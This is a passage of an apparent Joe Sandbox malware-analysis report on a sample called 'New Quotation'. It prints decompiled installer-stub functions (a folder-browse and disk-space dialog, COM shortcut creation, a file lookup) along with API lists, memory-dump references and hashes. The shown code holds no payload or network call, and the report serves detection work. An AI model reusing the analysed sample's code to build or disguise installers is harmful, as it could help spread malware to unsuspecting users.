                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                                          • Opcode ID: e3bcad73e1de128994d288fa0b6ef38954c80a91edb21965763d280816065a30
                                                                                                                                                                                          • Instruction ID: 7e4bd3fa72896d3e54e8b4d9ea8ddceac118c8145159a7c2ee745a60f6c60e84
                                                                                                                                                                                          • Opcode Fuzzy Hash: e3bcad73e1de128994d288fa0b6ef38954c80a91edb21965763d280816065a30
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8DD0A773B141018BD704EBFCFE8545E73E8EB503293208C37D402E10D1E678C846461C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 0040498A Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                          			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42c240; // 0x6211cc
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x436000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405B81(0x3fb, _t146);
					E004067C4(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405B81(0x3fb, _t146);
							if(E00405F14(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040653D(0x42b238, _t146);
							_t87 = E0040690A(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040653D(0x42b238, _t146);
								_t89 = E00405EB7(0x42b238);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x42b238) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405E58(0x42b238);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x42b238) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404E27(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x433edc; // 0x6252da
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404E0F(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x42b228);
									} else {
										E00404D46(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x434fa4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004044BB(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42d258 == _t158) {
									E004048E3();
								}
								 *0x42d258 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x42d268;
							_v60 = E00404CE0;
							_v56 = _t146;
							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405E0C(_t146);
								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Temp") {
									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
										lstrcatW(_t146, 0x432ea0);
									}
								}
								 *0x42d258 =  *0x42d258 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
						E00405E0C(_t146);
					}
					 *0x433ed8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404499(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404499(_t167);
					E004044CE(_t166);
					_t138 = E0040690A(8);
					if(_t138 == 0) {
						L53:
						return E00404500(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}














































                                                                                                                                                                                          0x0040498a
                                                                                                                                                                                          0x00404990
                                                                                                                                                                                          0x00404996
                                                                                                                                                                                          0x004049a3
                                                                                                                                                                                          0x004049b1
                                                                                                                                                                                          0x004049b4
                                                                                                                                                                                          0x004049bc
                                                                                                                                                                                          0x004049c2
                                                                                                                                                                                          0x004049c2
                                                                                                                                                                                          0x004049ce
                                                                                                                                                                                          0x004049d1
                                                                                                                                                                                          0x00404a3f
                                                                                                                                                                                          0x00404a46
                                                                                                                                                                                          0x00404b1d
                                                                                                                                                                                          0x00404b24
                                                                                                                                                                                          0x00404b33
                                                                                                                                                                                          0x00404b33
                                                                                                                                                                                          0x00404b37
                                                                                                                                                                                          0x00404b41
                                                                                                                                                                                          0x00404b4e
                                                                                                                                                                                          0x00404b50
                                                                                                                                                                                          0x00404b50
                                                                                                                                                                                          0x00404b5e
                                                                                                                                                                                          0x00404b65
                                                                                                                                                                                          0x00404b6c
                                                                                                                                                                                          0x00404b6f
                                                                                                                                                                                          0x00404bab
                                                                                                                                                                                          0x00404bad
                                                                                                                                                                                          0x00404bb3
                                                                                                                                                                                          0x00404bb8
                                                                                                                                                                                          0x00404bbc
                                                                                                                                                                                          0x00404bbe
                                                                                                                                                                                          0x00404bbe
                                                                                                                                                                                          0x00404bda
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404bdc
                                                                                                                                                                                          0x00404bdf
                                                                                                                                                                                          0x00404bed
                                                                                                                                                                                          0x00404bf3
                                                                                                                                                                                          0x00404bf4
                                                                                                                                                                                          0x00404bf7
                                                                                                                                                                                          0x00404bfa
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404bfa
                                                                                                                                                                                          0x00404b71
                                                                                                                                                                                          0x00404b73
                                                                                                                                                                                          0x00404b77
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404b79
                                                                                                                                                                                          0x00404b79
                                                                                                                                                                                          0x00404b86
                                                                                                                                                                                          0x00404b8b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404b8f
                                                                                                                                                                                          0x00404b91
                                                                                                                                                                                          0x00404b91
                                                                                                                                                                                          0x00404b9a
                                                                                                                                                                                          0x00404b9c
                                                                                                                                                                                          0x00404ba1
                                                                                                                                                                                          0x00404ba4
                                                                                                                                                                                          0x00404ba9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404ba9
                                                                                                                                                                                          0x00404c06
                                                                                                                                                                                          0x00404c10
                                                                                                                                                                                          0x00404c13
                                                                                                                                                                                          0x00404c16
                                                                                                                                                                                          0x00404c1d
                                                                                                                                                                                          0x00404c1d
                                                                                                                                                                                          0x00404c1f
                                                                                                                                                                                          0x00404c1f
                                                                                                                                                                                          0x00404c24
                                                                                                                                                                                          0x00404c26
                                                                                                                                                                                          0x00404c2e
                                                                                                                                                                                          0x00404c35
                                                                                                                                                                                          0x00404c37
                                                                                                                                                                                          0x00404c42
                                                                                                                                                                                          0x00404c42
                                                                                                                                                                                          0x00404c37
                                                                                                                                                                                          0x00404c49
                                                                                                                                                                                          0x00404c52
                                                                                                                                                                                          0x00404c5c
                                                                                                                                                                                          0x00404c64
                                                                                                                                                                                          0x00404c7f
                                                                                                                                                                                          0x00404c66
                                                                                                                                                                                          0x00404c6f
                                                                                                                                                                                          0x00404c6f
                                                                                                                                                                                          0x00404c64
                                                                                                                                                                                          0x00404c84
                                                                                                                                                                                          0x00404c89
                                                                                                                                                                                          0x00404c8e
                                                                                                                                                                                          0x00404c97
                                                                                                                                                                                          0x00404c97
                                                                                                                                                                                          0x00404ca0
                                                                                                                                                                                          0x00404ca2
                                                                                                                                                                                          0x00404ca2
                                                                                                                                                                                          0x00404cae
                                                                                                                                                                                          0x00404cb6
                                                                                                                                                                                          0x00404cc0
                                                                                                                                                                                          0x00404cc0
                                                                                                                                                                                          0x00404cc5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404cc5
                                                                                                                                                                                          0x00404b6f
                                                                                                                                                                                          0x00404b26
                                                                                                                                                                                          0x00404b2d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404b2d
                                                                                                                                                                                          0x00404a4c
                                                                                                                                                                                          0x00404a55
                                                                                                                                                                                          0x00404a6f
                                                                                                                                                                                          0x00404a74
                                                                                                                                                                                          0x00404a7e
                                                                                                                                                                                          0x00404a85
                                                                                                                                                                                          0x00404a91
                                                                                                                                                                                          0x00404a94
                                                                                                                                                                                          0x00404a97
                                                                                                                                                                                          0x00404a9e
                                                                                                                                                                                          0x00404aa6
                                                                                                                                                                                          0x00404aa9
                                                                                                                                                                                          0x00404aad
                                                                                                                                                                                          0x00404ab4
                                                                                                                                                                                          0x00404abc
                                                                                                                                                                                          0x00404b16
                                                                                                                                                                                          0x00404abe
                                                                                                                                                                                          0x00404abf
                                                                                                                                                                                          0x00404ac6
                                                                                                                                                                                          0x00404ad0
                                                                                                                                                                                          0x00404ad8
                                                                                                                                                                                          0x00404ae5
                                                                                                                                                                                          0x00404af9
                                                                                                                                                                                          0x00404afd
                                                                                                                                                                                          0x00404afd
                                                                                                                                                                                          0x00404af9
                                                                                                                                                                                          0x00404b02
                                                                                                                                                                                          0x00404b0f
                                                                                                                                                                                          0x00404b0f
                                                                                                                                                                                          0x00404abc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404a74
                                                                                                                                                                                          0x00404a62
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404a68
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004049d3
                                                                                                                                                                                          0x004049e0
                                                                                                                                                                                          0x004049e9
                                                                                                                                                                                          0x004049f6
                                                                                                                                                                                          0x004049f6
                                                                                                                                                                                          0x004049fd
                                                                                                                                                                                          0x00404a03
                                                                                                                                                                                          0x00404a0c
                                                                                                                                                                                          0x00404a0f
                                                                                                                                                                                          0x00404a12
                                                                                                                                                                                          0x00404a1a
                                                                                                                                                                                          0x00404a1d
                                                                                                                                                                                          0x00404a20
                                                                                                                                                                                          0x00404a26
                                                                                                                                                                                          0x00404a2d
                                                                                                                                                                                          0x00404a34
                                                                                                                                                                                          0x00404ccb
                                                                                                                                                                                          0x00404cdd
                                                                                                                                                                                          0x00404a3a
                                                                                                                                                                                          0x00404a3d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404a3d
                                                                                                                                                                                          0x00404a34

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 004049D9
                                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00404A03
                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                                                                                                                                                                          • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 00404AF1
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,Call), ref: 00404AFD
                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B0F
                                                                                                                                                                                            • Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94
                                                                                                                                                                                            • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75363420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                                                                                                                            • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                                                                                                                            • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,75363420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                                                                                                                            • Part of subcall function 004067C4: CharPrevW.USER32(?,?,75363420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
                                                                                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                                                                                                                                                                                            • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                                                                                                                                            • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                                                                                                                                                                            • Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                          • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                                                                                                                                                          • API String ID: 2624150263-3142480687
                                                                                                                                                                                          • Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                                                                                                                                          • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                                                                                                                                          • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                                                                          			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Local\\Temp");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                                                                                                                                                          0x004021b3
                                                                                                                                                                                          0x004021bd
                                                                                                                                                                                          0x004021c7
                                                                                                                                                                                          0x004021d1
                                                                                                                                                                                          0x004021dc
                                                                                                                                                                                          0x004021df
                                                                                                                                                                                          0x004021f9
                                                                                                                                                                                          0x004021fc
                                                                                                                                                                                          0x00402202
                                                                                                                                                                                          0x00402205
                                                                                                                                                                                          0x0040220f
                                                                                                                                                                                          0x00402213
                                                                                                                                                                                          0x00402213
                                                                                                                                                                                          0x00402218
                                                                                                                                                                                          0x00402229
                                                                                                                                                                                          0x00402231
                                                                                                                                                                                          0x004022e8
                                                                                                                                                                                          0x004022e8
                                                                                                                                                                                          0x004022ef
                                                                                                                                                                                          0x00402237
                                                                                                                                                                                          0x00402237
                                                                                                                                                                                          0x00402246
                                                                                                                                                                                          0x0040224a
                                                                                                                                                                                          0x0040224d
                                                                                                                                                                                          0x00402253
                                                                                                                                                                                          0x00402261
                                                                                                                                                                                          0x00402264
                                                                                                                                                                                          0x00402266
                                                                                                                                                                                          0x00402271
                                                                                                                                                                                          0x00402271
                                                                                                                                                                                          0x00402276
                                                                                                                                                                                          0x00402278
                                                                                                                                                                                          0x0040227f
                                                                                                                                                                                          0x0040227f
                                                                                                                                                                                          0x00402282
                                                                                                                                                                                          0x0040228b
                                                                                                                                                                                          0x0040228e
                                                                                                                                                                                          0x00402294
                                                                                                                                                                                          0x00402296
                                                                                                                                                                                          0x004022a0
                                                                                                                                                                                          0x004022a0
                                                                                                                                                                                          0x004022a3
                                                                                                                                                                                          0x004022ac
                                                                                                                                                                                          0x004022af
                                                                                                                                                                                          0x004022b8
                                                                                                                                                                                          0x004022be
                                                                                                                                                                                          0x004022c0
                                                                                                                                                                                          0x004022ce
                                                                                                                                                                                          0x004022ce
                                                                                                                                                                                          0x004022d1
                                                                                                                                                                                          0x004022d7
                                                                                                                                                                                          0x004022d7
                                                                                                                                                                                          0x004022da
                                                                                                                                                                                          0x004022e0
                                                                                                                                                                                          0x004022e6
                                                                                                                                                                                          0x004022fb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004022e6
                                                                                                                                                                                          0x004022f1
                                                                                                                                                                                          0x00402c2d
                                                                                                                                                                                          0x00402c39

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                                                                                          • API String ID: 542301482-670666241
                                                                                                                                                                                          • Opcode ID: 3c4303e572c21d3ee0d25cdd6e38a92fccf890e788a1af2a38fbfdcd1b0c250e
                                                                                                                                                                                          • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c4303e572c21d3ee0d25cdd6e38a92fccf890e788a1af2a38fbfdcd1b0c250e
                                                                                                                                                                                          • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 39%
                                                                                                                                                                                          			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E0040653D();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                                                                                                                                                                          0x00402923
                                                                                                                                                                                          0x0040293e
                                                                                                                                                                                          0x00402949
                                                                                                                                                                                          0x0040294a
                                                                                                                                                                                          0x00402a94
                                                                                                                                                                                          0x00402925
                                                                                                                                                                                          0x00402928
                                                                                                                                                                                          0x0040292b
                                                                                                                                                                                          0x0040292e
                                                                                                                                                                                          0x0040292e
                                                                                                                                                                                          0x00402c2d
                                                                                                                                                                                          0x00402c39

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
